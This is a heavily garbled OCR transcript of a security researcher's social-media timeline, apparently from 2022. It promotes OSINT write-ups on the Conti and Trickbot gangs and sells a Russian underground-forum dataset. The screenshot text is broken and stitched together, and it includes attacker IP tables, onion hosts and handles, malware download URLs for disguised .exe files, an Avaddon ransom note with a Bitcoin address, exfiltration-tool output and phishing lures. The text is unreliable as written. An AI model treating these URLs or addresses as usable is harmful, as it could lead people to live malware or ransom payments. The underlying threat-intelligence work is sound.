

strongly-disagree 


disagree 


February 10, 2022, 12:00:00 AM February 10, 2022, 10:52:19 AM 


February 10, 2022, 7:11:10 PM 
SYSTEM 


DISABLED 


09:00 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/E4gDw6wC8H 
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https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/OpKaBitYZn 


STIX2 Attack Pattern 
Attack Patterns are a type of TTP that describe adversaries attempt to comp 


A Can ribes a set of malicious activ 


STIX2 Campaign 

aign is a 
STIX2 Course Of Action 
A Co é of Action is 


STIX2 Grouping 


A Grouping object explictly a 


STIX2 Identity 


Kdentties can represent actual individuals, organizations, or groups (e.9., ACME 


STIX2 Incident 


The incident object in STIX 2.1 is a stub, to be expanded 


STIX2 Indicator 


Indicators contain a pattern that can be used to detect suspicious or 


STIX2 Infrastructure 
Infrastructure objects describe systems, software serv associated physical « 


STIX2 Intrusion Set 


An intrusion Set is a grc j set of adversary behavior and resources with common ¢ 


STIX2 Location 
A Location rep 


, STIX2 Malware An 


Malware Analys 


, STIX2 Malware 


Malware is a type of 


STIX2 Note 


A Note is a comment or note 


STIX2 Observed Data 


Observed data conveys information that was observed on system 


STIX2 Opinion 


An Opinion is an assessment of the correctness of t 


STIX2 Report 


Reports are collections of threat inteligence focus 


STIX2 Threat Actor 


Threat Actors are actua 
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https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/eKKHD1cgg7 
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https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/RrOrTmNWv5 
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https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/lIOpAc3SsXv 
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https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #ThreatIintelligence 
https://t.co/JsvVPo8GX8 
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https://t.co/OmUajr8DT8 https://t.co/291ruW7Vyo 
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Sample Logo of Dancho Danchev’s OpenCT! STIX2/TAXII Maltego Transforms Compatible OpencT! 
Instance Processing Hundreds of Never Published and Discussed Before Cybercrime incidents and Threat 


Intelligence Events 


09:03 
https://t.co/OmUajr8DT8 https://t.co/o50nfwASdg 
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@ Malware 

@ Cyber Jihad 

@ Cyber Terrorism 
@ Threat Actors 

@ Phishing 

@ Spam 

@ iM malware 

@ Mobile malware 


@ Mac OS X malware 


09:04 
https://t.co/OmUajr8DT8 https://t.co/ursAkwPewl 
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- Malicious URL Analysis - An Analysis 

- Targeted Mobile Malware Analysis - An Analysis 

- APT Coverage - New Campaign 

- Fraudulent Infrastructure - An Analysis 

- Online Fraud Campaign - An Analysis 

- Historical OSINT Campaign - An Analysis 

- Russian Business Network coverage 

- Koobface Botnet coverage 

- Kneber Botnet coverage 

- Hundreds of |OCs (Indicators of Compromise) 

- Tactics Techniques and Procedures In-Depth Coverage 
- Malicious and fraudulent infrastructure mapped and exposed 


- Malicious and fraudulent Blackhat SEO coverage 


~ Malicious spam and phishing campaigns 

- Malicious and fraudulent scareware campaigns 

- Malicious and fraudulent money mule recruitment scams 

- Malicious and fraudulent reshipping mule recruitment scams 

- Web based mass attack compromise fraudulent and malicious campaigns 


- Malicious and fraudulent client-side exploits serving campaigns 
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We Cover the Following Threat 
Intelligence Feed Categories 
Historically and in Real-Time 


~ The Russian Business Network Coverage — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


~ Cyber Jihad Online Activities Coverage —- Complete Qualitative and Incident and Campaign 
Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of loCs 
(Indicators of Compromise) and MD5s 


— Proliferation of DIY Hacking Tools Coverage — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


— The Rise of Rogue Antivirus Software Coverage — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


— Cybecrime DIY Tools and Artifacts Coverage — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/iPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


— Web Malware Exploitation Kits Incidents and Campaigns — Complete Qualitative and 
Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant 
Emails thousands of loCs (Indicators of Compromise) and MD5s 


— Blackhat SEO Campaigns and Incidents — Complete Qualitative and Incident and Campaign 
Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of loCs 
(Indicators of Compromise) and MD5s 


~ Embedded Malware Campaigns and Incidents — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


Who needs a 100GB Russian underground forums data set obtained using public 
sources in 2022? Drop me a line at dancho.danchev@hush.com I’m offering 50% 


discount to anyone who drops me a line today! Happy researching! Cheers! 


https://t.co/3s1Wx63SgX 
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= it-24h.com.rar 
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SB LinkFeed.rar 
= Linuxac.org.rar 
N= Master-X.rar 
= MaulTalk.rar 
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= Forum.Zloy.bz.rar 

N= ForumSape.rar 

eS ForumSEO.rar 

B Forum-UINSell.rar 

= Free-hack.rar 

= gerki.pw.rar 
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N=} Forum.Zloy.bz.rar 

eS ForumSape.rar 

S ForumSEO.rar 
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Who needs a 100GB Russian underground forums data set obtained using public 
sources in 2022? Drop me a line at dancho.danchev@hush.com I’m offering 50% 


discount to anyone who drops me a line today! Happy researching! Cheers! 
https://t.co/A6BNGNIQQOW 
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<parent> 
11Wang 
365Exe 
419eater 
4HatDay 
aHack 
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BlackhatWorld 
BPCForum 
Cardvilla 
Chf 
CNHonker 
CNSec 
Crack-Forum 
Cracked.to 
Cyberizm 
Darkmarket.la 
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Darkmoney iHonker 
DarkWeb LinkFeed 
DomenForum Linuxac.org 
Eviloctal Master-X 
Exelab MasterWebs 
Forum-UINSell MaulTalk 
Forum.Zloy.bz Mmpg.ru 
ForumSape = Mr11-11mr.7olm.org 
ForumSEO Nullnoss.org 
Free-hack pay-per-install.org 
ghostmarket.net PhreakerPro 
Gla.vn Piratebuhta.pw 
GoFuckBiz ProCrd 
gofuckbiz.com ProLogic 
H4kurd.com Promarket 
Hack-Port ProxyBase 
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Hackings SEOForum 
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ShadowMarket 
SkyFraud 
Spyhackerz 
Svuit.vn 
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# ip Country City Region 

1 45.14.226.47 Netherlands Amsterdam = North Holland 

2 75.151.48.49 United Madison Tennessee 
States 

3 96.93.217.253 United Littleton Colorado 
States 

4 173.163.176.177 United Wilkes-Barre Pennsylvania 
States 

5 184.146.91.74 Canada Amhertsburg Ontario 

6 73.128.248.22 United Baltimore Maryland 
States 

7 = 73.31.89.221 United Bluefield West Virginia 
States 

8 162.244.81.252 United New York New York 
States 

9 172.83.155.195 United Seattle Washington 
States 

10 195.123.214.177 Latvia Riga Riga 

11 75.147.147.133 United Cape Coral Florida 
States 

12 186.72.79.132 Panama Panama City Provincia de 

Panama 

13 128.199.196.59 Singapore Singapore Unknown 

14 38.88.223.172 United Los Angeles _— California 
States 

04:01 


514 


"Exposing the Conti Ransomware Gang - An OSINT Analysis" - 
https://t.co/PFpmjFOHQN #Conti #Ransomware #security #cybercrime #malware 


IsP 
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Comcast Cable 
Communications 


Comcast Cable 
Communications, 
LLC 


Comcast Cable 
Communications 


Bell Canada 


Comcast Cable 
Communications 


Comcast Cable 
Communications 


Data Room, Inc 


Spartan Host LLC 


ITLOC Latvia 
network 


Comcast Cable 
Communications, 
LLC 


Cable & Wireless 
Panama 


DigitalOcean, LLC 


Cogent 
Communications 


Org 
SKB Enterprise B.V 


Stones Riverelectric 


Comcast Cable 
Communications, 
Lic 


SALE'S MARTIN'S 


Sympatico HSE 


Comcast IP Services, 
LLC. 


Comcast IP Services, 
LLC. 


Data Room, Inc 


TMT Hosting 


Green Floid LLC 


Comcast Business 
Communications, 
uc 


Cable & Wireless 
Panama 


Digital Ocean 


Cogent 
communications - 
IPENG 


Latitude 
52.3759 


36.2562 


39.6133 


41.1988 


42.1168 


39.3046 


37.2697 


40.7128 


47.4902 


56.9496 


26.6786 


8.9948 


1.32123 


34.0522 


Longitude 
4.8975 


-86.7143 


-105.017 


~75.9053 


~83.0498 


~76.6412 


~81.2212 


~74.006 


-122,.3004 


24.0978 


~82.0263 


-79.523 


103.695 


-118.244 


#cyberattacks #CyberAttack #CyberSecurity #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/jXEtLf}Qk2 
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5.2.78.121 Netherlands Amsterdam North Holland The infrastructure — Liteserver DORN VPS 52.3676 4.90414 


Group 8.V. 
195.149.87.233 United Secaucus New Jersey innovation IT PQ HOSTING S.R.L 40.7876 -74.06 
States Solutions LTD 
185.158.249.249 Netherlands Naaldwijk South servinga GmbH ALLSYS Limited 51.9981 4.198 
Holland 
31.214.157.242 Netherlands Naaldwijk South servinga GmbH servinga GmbH 51.9981 4.198 
Holland 
38.92.176.125 United Minneapolis Minnesota Madgenius.com Mad Genius 44.9715 -93.2703 
States 
195.123.219.82 Netherlands Meppel Drenthe ITLDC Netherlands Layer6 Networks 52.6959 6.1847 
network 
185.158.249.119 Netherlands Naaldwijk South servinga GmbH ALLSYS Limited 51.9981 4.198 
Holland 
23.146.242.134 United Chinchilla Pennsylvania VolumeDrive VolumeDrive 41.4873 -75.6966 
States 
51.38.95.29 United London England OVH SAS EL Zayat Hadi 51.5074 -0.127758 
Kingdom 
46.19.136.221 Switzerland Zurich Zurich Airvpscomp Unknown 47.3538 8.5587 
Vpsprovider 
142.4.211.167 Canada Beauharnois Quebec OVH SAS OVH Hosting, Inc. 45.3151 -73.8779 
195.123.221.248 Netherlands Meppel Drenthe ITLDC Netherlands Layer6 Networks 52.6959 6.1847 
network 
37.187.24.215 France Gravelines Hauts-de- OVH SAS OVH SAS 50.9871 2.12554 
France 
5.34.181.18 Netherlands Meppel Drenthe VDS/VPS SERVERIUS Unknown 52.6959 6.1847 
NL 
194.76.225.152 Netherlands Naaldwijk South servinga GmbH servinga GmbH 51.9981 4.198 
Holland 
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[+1] WinSock initialized 

C+] 10 completion port initialized... 

Check server 139.606.160.200... 

{+] Server connected ... 

Stats: @ files “size 20.9 MB>. read speed 4.18 MB/sec ‘compression ra 
tio 91%>, upload 6 bytes/sec 

Stats: 71 files <size 529 MB>,. read speed 26.4 MB/sec Ccompression ra 
tio 99~%>, upload 8.31 MB/sec 

Stats: 166 files “size 2.17 GB>. vead speed 27.8 MB/sec Ccompression 
ratio 99%>,. upload 22.9 MB/sec 

Stats: 266 files “size 3.75 GBD, rvead speed 27.4 MB/sec “compression 
ratio 99%>, upload 25.6 MB/sec 

Stats: 336 files ‘(size 5.36 GBD. read speed 27.4 MB/sec ‘compression 
ratio 99%>,. upload 25.6 MB/sec 
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Amazon 30th Anniversary Celebration 


Amazon's 30th Anniversary Celebration is coming to an end. 
ast stage of the raffle for a USD 10-200 gift card and other prizes 


To participate in the raffle, you need to download the Lottery App and generate a unique code 


How to take part in the raffle? 


2. Run the application. The application will generate a code to participate in the lottery 
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@ Apple 
Hello! 


‘We are aston for your help. Please check the wformamon in the generated 
ivoxte [ provide. Your email provider rejects a letter with attachments. 
Sa, 


the personal Goud, here a the link: 


Provide all the related information a4 $000 as you Can. 
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Full dumps 


ted here companies do not wish to with us, and trying t 


Wait for them private papers here 


P.S. We have the second domain: newsmaze.top 


Read more 
https://nhai.gov.in/ 
Article about National Highways Authority of India have been locked 


2ad more 
https://nhai.gov.in/ 
Article about National Highways Authority of India have been locked 


Read more 


hittps://nhai.gov.in/ 
Article about National Highways Authority of India have been locked 
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BiGQQ@- Manage 
Home Share View 


Application Tools 


4’ || » ThisPC > LocalDisk(C:) > Users > TSTIOENG >» Downloads » di2 


wh Quick access bs 
Ea az : $6 PM Application 236 KB 

BB Desktop 

ae Downloads 

=) Documents 


© Pictures 


d Music 
B Videos cmd.exe - Application Error 
@& OncDrive 
GS This PC (x) The application was unable to start correctly (Oxc0000005). 


Click OK to close the application 
o> Network 


[ ox | 
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SQLSTATE[42S22]: 
Column not found: 1054 


Unknown column 
‘api_token’ in ‘field list’ 


Wuminate\Database\QueryException 


Doctrine\DBAL\Driver\PDOException 


PDOException 


PDO prepare 
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JSON Raw Data Headers 


Copy 


Response Headers 


Cache-Control no-cache, private 
Connection Keep-Alive 
Content-Length 2 
Content-Type application/json 
Date Mon, 29 Jun 2020 13:55:53 GMT 
Keep-Alive timeout=5, max=100 
Server Apache/2.4.2 (Win64) PHP/7.3.13 OpenSSL/1.0.1c 
X-Powered-By PHP/7.3.13 
X-RateLimit-Limit 60 
X-RateLimit-Remaining 59 


Request Headers 


Accept text/htmlapplication/xhtml+xmLapplication/xmtiq=0.9,"/*:q=0.8 
Accept-Encoding gzip, deflate, br 
Accept-Language en-US,en;q=0.5 
Connection keep-alive 
Host a3ggjhcskbjg36bx.onion 
Upgrade-Insecure-Requests 1 
User-Agent Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 
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Languages Personal Privacy 


Learn how we process your data in our Privecy Poltcy. See the categories of dete we process 


Updete 
Pa in our Product Policy 


Notifications 
Improvements 


— Share threat data with Avast to improve the security of all Avast antivirus 
Protection users (Community IQ) 

Blocked & Allowed Share app-usage data with Avast to help us with new product 
development. 


Privacy Share app-usage data with 3rd-party analytics tools to improve this app. 


Offers 


Share app-usage data with Avast so we may offer you upgrades or our 


sh 
moeisesnoomag other products 


Share app-usage data with Avast so we may offer you 3rd party 
products. 


These settings apply onty to Avest Business Antivirus 
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WY Protection history 


View the latest protection actions and recommendations from Windows 


Security. 
i ty 
Oo All recent items Filters \“ 
R 
GQ Threat found - action needed. Severe 
«)) 7/14/2020 11:13 AM 
A 


Status: Active 
Active threats have not been remediated and are running on your device. 


A 
Threat detected: Trojan:Win32/Ulthar.A!ml 
wa) Alert level: Severe 
Date: 7/14/2020 11:13 AM 
Category: Trojan 
A Details: This program is dangerous and executes commands from an attacker. 


Learn more 


Affected items: 
file: C:\Users\Administrator\Downloads\DocumentPreview (13).exe 


webfile: C:\Users\Administrator\Downloads\DocumentPreview (13).exe| 
about:internet|pid:3276,ProcessStart:132391659341593689 
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https://t.co/Psy98IDRla 


Document_BritishAirways (2}.exe x 


https://www.shiningshadowllc.com/Document_BritishAinvays.ex 


@o 


=| 


Show in folder ra) 


A Rexe 


http://194.5.249.13/Pexe 


This file is not commonly downloaded and may be dangerous 
_— e 


‘A Document_BritishAirways (1}.exe 


om 


https://www.shiningshadowllc.com/Document_BritishAinways.ex 


This file is dangerous, so Chrome has blocked it 


Remove from list Keep dangerous file (a) 
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3 . # col.py 
1 PaGounii cron 
+ Jerpysxu 
flow 
Aoxymente: at 
Viro6pamenna 


\ WorkPro 
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@SOufi4n3 @hacks4pancakes @CoreSecurity @SOSIntel @Cyberknow20 
https://t.co/vSCjG6FXyB 


2 
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@BrettCallow https://t.co/vSCjG6FXyB 
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@likethecoins https://t.co/vSCj)G6FXyB 
*1 
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@LawrenceAbrams https://t.co/vSCjG6FXyB 
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@VK_Intel https://t.co/vSCjG6FXyB 
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@Malwarenailed @VK_Intel @malwrhunterteam @AShukuhi https://t.co/vSCjG6FXyB 
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@Cyberknow20 @AShukuhi @BrettCallow @SOSIntel @pancak3lullz @SOufi4n3 
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@SOufi4n3 @ValeryMarchive @ransomwaremap @uuallan @GossiTheDog 
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March 


1 - Tuesday 
01:05 
@darkowlcyber https://t.co/vSCjJG6FXyB 
*3 
02:55 
https://t.co/Cvb6i70jN5 [PDF] https://t.co/wle7LSZaLR 
= Chapter 1 
Intelligence 
The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Kooblace Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns inchating Botnet and 
Money Mule Recrusimem Scams Traced Down to Their 
Source Including Various Unxiergrounsd Market Propositions 
Exposed 
https //ddanchev. blogspot.com 
Dancho Danchev 
= # Q2Q< # 

Chapters Notebook Search Share Settings 
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@vxunderground @ContiLeaks https://t.co/vSCjJG6FXyB 


544 


23 *6 


05:47 

@noottrak @cedricpernet Psst! - https://t.co/vSCj)G6FXyB Enjoy! 
05:48 

@ContiLeaks Here’s my analysis - https://t.co/vSCjJG6FXyB Enjoy! 
26 *19 
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@BushidoToken My analysis - https://t.co/vSCjG6FXyB Enjoy! 
*3 
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@AShukuhi My analysis - https://t.co/vSCjG6FXyB Enjoy! 
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@GazTheJourno @BrianHonan My analysis - https://t.co/vSCjG6FXyB Enjoy! 


05:52 
@christogrozev @navalny My analysis - https://t.co/vSCjJG6FXyB Enjoy! 
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This is me in @wikileaks - https://t.co/SRSIBRVJOh Cheers! 


05:53 


This is me in @Snowden archive - https://t.co/m3aJX6NLsm article - 
https://t.co/Lxt3ZC5M8w 
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"The Cyber War Between #Russia and #Ukraine - An #OSINT Analysis" - 
https://t.co/tvPw6esTeM #OSINTUkraine https://t.co/n7O0hpVibqc 
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& Disbalancer 0.7.2-main a 


Stopped 


Client ID: 
Stats: Packets sent —— 


Tasks 


EDs -> Enz lanreerer a 
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BIG = Manage 
| Fite | Home Share View Application Tools 


= ~ 4 |) > ThisPC > LocalDisk(C:) » Users > TSTIOENG » Downloads » di2 


ame te modified type 
we Quick access 
Wa ai2 7/27/2020 1:46 PM 
GB Desktop 
& Downloads 


=) Documents 


Application 236 KB 


© Pictures 
d Music 


i Videos [ 7 


emd.exe - Application Error x 
@& OnceDrive 


The application was unable to start correctly (0xc0000005). 
(Gl This PC x] Click OK to close the application 
oi Network 


<= 
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SQLSTATE[42S22]: 
Column not found: 1054 


Unknown column 
‘api_token’ in ‘field list’ 


Wuminate\Database\QueryException 


Doctrine\DBAL\Driver\PDOException 


PDOException 


PDO prepare 
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JSON Raw Data Headers 


Copy 


Response Headers 


Cache-Control no-cache, private 
Connection Keep-Alive 


Content-Length 2 


Content-Type application/json 
Date Mon, 29 Jun 2020 13:55:53 GMT 
Keep-Alive timeout=5, max=100 
Server Apache/2.4.2 (Win64) PHP/7.3.13 OpenSSL/1.0.1c 
X-Powered-By PHP/7.3.13 


X-RateLimit-Limit 60 
X-RateLimit-Remaining 59 


Request Headers 


Accept 

Accept-Encoding 
Accept-Language 
Connection 

Host 
Upgrade-Insecure-Requests 
User-Agent 
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text/ntmLapplication/xhtml+xmlapplication/xmtq=0.9,*/*:q=0.8 
gzip, deflate, br 

en-US,en;q=0.5 

keep-alive 

a3ggjhcskbjg36bx.onion 

1 

Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 
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Languages Personal Privacy 


Update Learn how we process your data in our Privecy Poltcy. See the categories of dete we process 
a in our Product Policy 


Notifications 
Improvements 


Exceptions Share threat data with Avast to improve the security of all Avast antivirus 
Protection users (Community IQ) 


Blocked & Allowed 
opps 


Share app-usage data with Avast to help us with new product 
development. 


Privacy Password Share app-usage data with 3rd-party analytics tools to improve this app. 


Offers 


Share app-usage data with Avast so we may offer you upgrades or our 


piest 
Roeisesnootng other products 


Share app-usage data with Avast so we may offer you 3rd party 
products. 


These settings apply onty to Avest Business Antivirus 
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Y Protection history 


View the latest protection actions and recommendations from Windows 


Security. 
i ty 
Oo All recent items Filters 
R 
GQ Threat found - action needed. Severe 
«)) 7/14/2020 11:13 AM 
A 


Status: Active 
Active threats have not been remediated and are running on your device. 


A 
Threat detected: Trojan:Win32/Ulthar.A!ml 
ows) Alert level: Severe 
Date: 7/14/2020 11:13 AM 
Category: Trojan 
a Details: This program is dangerous and executes commands from an attacker. 


Learn more 


Affected items: 
file: C:\Users\Administrator\Downloads\DocumentPreview (13).exe 


webfile: C:\Users\Administrator\Downloads\DocumentPreview (13).exe] 
about:internet|pid:3276,ProcessStart:132391659341593689 
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https://t.co/vSCjG6FXyB #ContiLeaks #ContiLeak https://t.co/RXavAk95Vv 
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Document_BritishAirways (2}.exe x 


https: /Awww.shiningshadowllc.com/Document_BritishAinvays.exe 
y 


Show in folder ra) 


A Rexe 


http://194.5.249.13/Pexe 


This file is not commonly downloaded and may be dangerous 
M0 0 


rt Document_BritishAirways (1}.exe 


https://www.shiningshadowllc.com/Document_BritishAinvays.exe 


This file is dangerous, so Chrome has blocked it 


Remove from list Keep dangerous file (a) 
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beicTpei aocryn 
- . # col.py 
1 PaGounii cron 
conv.awk 
“ 
* 2arpysnn 
PY server0. tt 
Aonymente: al 


ViroGpamenna 


} WorkPro 


‘1 
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(AV A es Oe 


tm 


Your network has been infected by Avaddon 


See 


To decrypt your files you ow tnow Follow the 


imtrection below t 


encrypted General Decryptor that you do not have much tine 


Time left: 


[m] =a [a] To recover your files, 
b 7 you must pay the fee. 


Joubled, so if @ was 1000$ will become 2000$. 


0.1261769 BTC to this address 
3HhyrkzbASkU33HL9ZHC 1SyhbDda2fgitu 
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how it works 


step 3/3 


= 
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AMIMYJIbC K KA3HH 


BAATOTBOPUTENbHbIN DOHA 
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@HackingDave My analysis - https://t.co/vSCjJG6FXyB Enjoy! 
*3 
07:38 

@JBurnsKoven My analysis - https://t.co/vSCjG6FXyB Enjoy! 
*2 
07:50 

@threatpost @BrianHonan My analysis - https://t.co/vSCjG6FXyB Enjoy! 

09:13 


@John_Fokker @digihash @MISPProject @TrellixLabs @ChristiaanBeek @adulau My 
analysis - https://t.co/vSCjJG6FXyB Enjoy! 
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09:14 
@tiskimber My analysis - https://t.co/vSCjG6FXyB Enjoy! 
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10:15 


@KimZetter My analysis - https://t.co/vSCjJG6FXyB Enjoy! 


10:16 


@albertzsigovits @VK_Intel @BushidoToken @malwrhunterteam @vxunderground 
@campuscodi @BleepinComputer @MalwareTechBlog @CharityW4CTI Source code 
for malicious software is a commodity! Check out my analysis here - 
https://t.co/vSCjJG6FXyB Enjoy! 


*1 
10:16 


@EmCEllis Awesome! Thanks for the comment! 


*1 
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RT @whoisxmlapi: #VoidBalaur gang has been launching #typosquatting &amp; 
spear #phishing attacks worldwide. 


WXA researcher @dancho_danchev do... 


2 - Wednesday 


00:57 
@briankrebs My analysis - https://t.co/vSCjJG6FXyB Enjoy! 
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Post updated - "Exposing the #Conti #Ransomware Gang - An #OSINT Analysis" - 
https://t.co/vSCjG6FXyB https://t.co/kmpchBWnwj 
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stern@q3mcco35auwcstmt.onion 


taker@q3mcco35auwcstmt.onion 
a 


zulas@q3mccoS5auwcstmt.onion 


grant@q3mcco35auwcstmt.onion 
ees 


sunday@q3mcco35auwcstmt.onion 


mango@q3mcco35auwcstmt.onion 


0.344 


e 0.226 


0.217 


0.173 


0.137 


0.095 
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https://t.co/vSCjG6FXyB https://t.co/cUktcmD7eB 
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pumba@q3mcco35auwestmt.onion 


dandis@q3mcco25auwcstmt. onion 


tramp@q3mcco35auwcstmt.onion 
professor@q3mcco35auwcstmt.onion 
bergangster@q3mcco35auwcstmt.onion 

skippv@aqame Sauwestmtonion 


bio@a3mecoS5auwestmt. onion 
“enter mecoe35auwcstmt.onion 


vente q3mecto25auwcstmtonion 
NOUN cco westmtonion 


Ne un] 56 ae om 5auwcstmtonion 


d ara ps5auwestmt onion _unu— green@q3mcco3S5auwestmt.onion 

sim Xe coos sya onion’ —_ dereksan@iq3meco35auwcstmt onion 

oho a Mi 1@ ASmMe 29 abauwestinonier Noun] 
a 20 osSauwestmtonion _ _-you 
Tae ul O35 auwcstmt. onion [Adj] 

0 nicco35auwcstmt.onion 3awudpogane [ProperNoun] 

Pore Temecas, es ~~love@g3meto3Sauwcstmt onion 

Fs iday@qsr i n@q3meco35auwcstmt onion e a 

Ne ‘mango@a3morbasauwestmto on— n[ProperNoun] B 


Fi? Q.3™M sco35auwcstmt, onion netwalker@qameco3Sauwestmt onion 


., q rt —eCTb oe tr@conterence.« q3meco35auwcstmt.onion [Adj] 
OWMBR > ee i —Specter@g3mecco3sauwestmtonion 
zulas ean : coe mn rie — —puza@ @q3mcco3Sauwcstmt onion 
snip Saal onion 
Urereton a ep qamerd: Sauwestmt onion 
Wticorvereace: q&mcco35auwcstmt. onion [Noun] 


2021-08-31t09 y Mo i 
2021-08-31t08 gia ol grom@q3mcco35auwcstmt. onion 
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RT @EmCEllis: Really interesting data collection from the #ContiLeak from 
@dancho_danchev’s Blog - Mind Streams of Information Security K... 
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10:34 
@evacide My analysis - https://t.co/vSCjG6FXyB Enjoy! 


4 - Friday 


08:47 
https://t.co/LoqCAQ5Qbl 
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09:06 


"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqCAQ5Qbl https://t.co/k7xDWRAr60 


*1 
, The code execution cannot proceed because MSVCR100D.dil 
was not found. Reinstalling the program may fix this problem. 
OK 
09:06 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqCAQ5QbI https://t.co/tOFPfzluFi 
: @- 
Live eh ie MOA Qhrstis % 
#@ Downk X Properties (1) New ~ Vv 
= _eSewms 
09:06 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqCAQ5Qbl https://t.co/eyNcmiBdl9 
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"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/logCAQ5Qbl https://t.co/r4v8Q3FduZ 


Ce © mspector © Console (© Debugger {} Styte Exiitor @) Performance (} Memory TJ Network is) Storage * Accessibility al} 4 


8 
| Errors | Warnings | Logs | Into | Debug } 
ser b3esceascfbse31bf798200054236ac1 : 9: 


A Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at Mhttps://a3ggjhcskbjgséDx. onion: 6002 
/socket.10/7€lO=34¢transport=pollingéct=nEwhrkd. (Reason: CORS request did mot succeed). [Learn More) 

A Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at Aitps://a3ggihcskbjgs6bx. onion:6001 

/socket.10/7EIO*34transport=pollingaét=NEwhtv4. (Reason: CORS request did not succeed). [Learn More 


A Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at frtps ‘a3ggyhcskbjgséDx. onion: 6002 


/socket.20/781O0#34Cransport=pollingétentwhuie. (Reason: CORS request did mot succeed). [Learn More] 
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https://t.co/LoqCAQ5QbI https://t.co/6qUWtSfztG 


09:07 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/LoqCAQ5QbI https://t.co/Jvb1IEj84K 
09:07 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/LoqCAQ5QbI https://t.co/jEGup7vVWh 
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"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqCAQ5QbI https://t.co/Nplo4nwNxh 
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"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqgCAQ5Qbi https://t.co/ewO3Tfirbt 


RunDLL 


a There was a problem starting 
\ ) C:\Users\user\Downloads\1\dl2.dll 


The specified module could not be found. 


"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/logCAQ5QbI https://t.co/m3JLfuoGEi 


cmd.exe - Application Error x 


( v ) The application was unable to start correctly (0xc0000005). 
a” Click OK to close the application. 


"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/logCAQ5Qbl https://t.co/4ntACvulKx 


09:08 


09:08 


09:08 


The program or feature "\??\C:\Users\TST7x04\AppData\Local\ Temp\C8FC.exe" 
cannot start or run due to incompatibity with 64-bit versions of Windows. Please 
contact the software vendor to ask if a 64-bit Windows compatible version is 
available. 


"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqcCAQ5QbI https://t.co/Vod7YqUIxb 


> Failed - Virus detected 


greenmountains.ae/Do%D 1%8 1ument_Pr%DO%B5view.exe 
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185.172.129.62 


ee ri. a, Am, 
@) @) q@) @) 

<) wd S.<) S<) 
mx01.cxmdi.ru mx0.cemdi.ru server1_cxmdi.ru mox.comdi.ru 
@) oO) © © 
server.cemdi.ru tbidedicated.example.com  i.donald741.example.com an-partner.com 
‘o 1) 


gate3_piratia.info free.ds 
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zhixiao58.cn 


23:07 


@ 


2880981260@qq.com 


Do you know someone who needs a 100GB raw HTML of public Russian cybercricrime 
forums data set for research purposes? The price is $500. Let me know if you’re 
interested or in case you know someone and | would be happy to send a sample if 

necessary. https://t.co/EDWAqDxtuO 
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Webmasters.ru 
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WWH-Club 
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5 - Saturday 


03:47 


My RSS feed - https://t.co/2VRBr24Ya9 #security #cybercrime #malware 
#cyberattacks #CyberAttack #cyberwar #Threatintel #ThreatHunting #threatreport 
https://t.co/mEdkYISLWI 


10:09 


| need a major client or #Threatintelligence or #ThreatHunting teams for my 
https://t.co/WIBGTU5ryT project. | can deliver you the raw and enriched loCs in-depth 
perspectives and | can do it in bulk on a daily basis. | can offer bulk account 
discounts. https://t.co/DINUxKqxm0 
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19:36 


Check this out! https://t.co/qOxgOMRRFz 


QAHC.bg gansbdg - 4 

ATS @PavlikMorozovBG @svetlinco 0 AoKnNagBaH e, VMaMe VU CHMMKa axe. 

— ee 
® View conversation 


QAHC.bg added you to list dansbg/Banxepyuetata 


19:37 
Check this out! https://t.co/E6bkT9ICNU 


ay 


way 


Teopru MbpBaHos 
@georgeparvanov 


Replying to @bo_go 


